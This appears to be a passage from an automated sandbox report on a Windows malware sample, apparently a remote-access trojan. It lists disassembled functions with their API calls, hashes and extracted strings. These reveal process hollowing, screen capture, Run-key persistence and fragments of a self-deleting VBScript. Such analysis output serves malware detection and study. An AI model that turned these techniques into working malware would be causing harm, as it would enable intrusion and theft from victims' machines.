                        • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                        • Opcode Fuzzy Hash: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                        • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                        Function 00434C52 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                        Download Yara Rule
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: FeaturePresentProcessor
                        • String ID:
                        • API String ID: 2325560087-3916222277
                        • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                        • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                        • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                        • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                        Function 0044E879 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: .
                        • API String ID: 0-248832578
                        • Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                        • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                        • Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                        • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                        Function 00451F9B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                        • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                        • String ID: lJD
                        • API String ID: 1084509184-3316369744
                        • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                        • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                        • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                        • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                        Function 00452036 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                        • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                        • String ID: lJD
                        • API String ID: 1084509184-3316369744
                        • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                        • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                        • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                        • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                        Function 004488ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoLocale
                        • String ID: GetLocaleInfoEx
                        • API String ID: 2299586839-2904428671
                        • Opcode ID: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
                        • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                        • Opcode Fuzzy Hash: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
                        • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                        Function 00412077 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
                        • HeapFree.KERNEL32(00000000), ref: 004120EE
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$FreeProcess
                        • String ID:
                        • API String ID: 3859560861-0
                        • Opcode ID: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
                        • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                        • Opcode Fuzzy Hash: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
                        • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                        Function 00452313 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                          • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$_free$InfoLocale_abort
                        • String ID:
                        • API String ID: 1663032902-0
                        • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                        • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                        • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                        • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                        Function 00452543 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$InfoLocale_abort_free
                        • String ID:
                        • API String ID: 2692324296-0
                        • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                        • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                        • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                        • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                        Function 0041B60D Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                        Download Yara Rule
                        APIs
                        • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: NameUser
                        • String ID:
                        • API String ID: 2645101109-0
                        • Opcode ID: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                        • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                        • Opcode Fuzzy Hash: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                        • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                        Function 00448404 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(?,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                        • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalEnterEnumLocalesSectionSystem
                        • String ID:
                        • API String ID: 1272433827-0
                        • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                        • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                        • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                        • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                        Function 00451F50 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                        • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                        • String ID:
                        • API String ID: 1084509184-0
                        • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                        • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                        • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                        • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                        Function 0040F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                        Download Yara Rule
                        APIs
                        • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.0.0 Pro), ref: 0040F8E5
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoLocale
                        • String ID:
                        • API String ID: 2299586839-0
                        • Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                        • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                        • Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                        • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                        Function 00434B47 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                        Download Yara Rule
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                        • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                        • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                        • Instruction Fuzzy Hash:
                        Function 00418E76 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                        • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                          • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                        • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                        • DeleteDC.GDI32(00000000), ref: 00418F2A
                        • DeleteDC.GDI32(00000000), ref: 00418F2D
                        • DeleteObject.GDI32(00000000), ref: 00418F30
                        • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                        • DeleteDC.GDI32(00000000), ref: 00418F62
                        • DeleteDC.GDI32(00000000), ref: 00418F65
                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                        • GetIconInfo.USER32(?,?), ref: 00418FBD
                        • DeleteObject.GDI32(?), ref: 00418FEC
                        • DeleteObject.GDI32(?), ref: 00418FF9
                        • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                        • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                        • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                        • DeleteDC.GDI32(?), ref: 0041917C
                        • DeleteDC.GDI32(00000000), ref: 0041917F
                        • DeleteObject.GDI32(00000000), ref: 00419182
                        • GlobalFree.KERNEL32(?), ref: 0041918D
                        • DeleteObject.GDI32(00000000), ref: 00419241
                        • GlobalFree.KERNEL32(?), ref: 00419248
                        • DeleteDC.GDI32(?), ref: 00419258
                        • DeleteDC.GDI32(00000000), ref: 00419263
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                        • String ID: DISPLAY
                        • API String ID: 479521175-865373369
                        • Opcode ID: eeea48b2f12328c67a7764adb0283258d44bef4919e0b7e4c041a6272c1fd371
                        • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                        • Opcode Fuzzy Hash: eeea48b2f12328c67a7764adb0283258d44bef4919e0b7e4c041a6272c1fd371
                        • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                        Function 004180EF Relevance: 49.3, APIs: 22, Strings: 6, Instructions: 289libraryloaderthreadCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                        • GetProcAddress.KERNEL32(00000000), ref: 00418139
                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                        • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                        • GetProcAddress.KERNEL32(00000000), ref: 00418161
                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                        • GetProcAddress.KERNEL32(00000000), ref: 00418175
                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                        • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                        • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                        • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                        • ResumeThread.KERNEL32(?), ref: 00418435
                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                        • GetCurrentProcess.KERNEL32(?), ref: 00418457
                        • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                        • GetLastError.KERNEL32 ref: 0041847A
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                        • API String ID: 4188446516-108836778
                        • Opcode ID: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                        • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                        • Opcode Fuzzy Hash: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                        • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                        Function 0040D420 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                          • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                          • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                        • ExitProcess.KERNEL32 ref: 0040D7D0
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                        • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                        • API String ID: 1861856835-332907002
                        • Opcode ID: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                        • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                        • Opcode Fuzzy Hash: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                        • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                        Function 0040D096 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                          • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                        • ExitProcess.KERNEL32 ref: 0040D419
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                        • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                        • API String ID: 3797177996-2557013105
                        • Opcode ID: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                        • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                        • Opcode Fuzzy Hash: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                        • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                        Function 00412475 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                        • ExitProcess.KERNEL32(00000000), ref: 004124A0
                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                        • CloseHandle.KERNEL32(00000000), ref: 0041253B
                        • GetCurrentProcessId.KERNEL32 ref: 00412541
                        • PathFileExistsW.SHLWAPI(?), ref: 00412572
                        • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                        • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                          • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                        • Sleep.KERNEL32(000001F4), ref: 00412682
                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                        • CloseHandle.KERNEL32(00000000), ref: 004126A9
                        • GetCurrentProcessId.KERNEL32 ref: 004126AF
                        Strings
                        Memory Dump Source
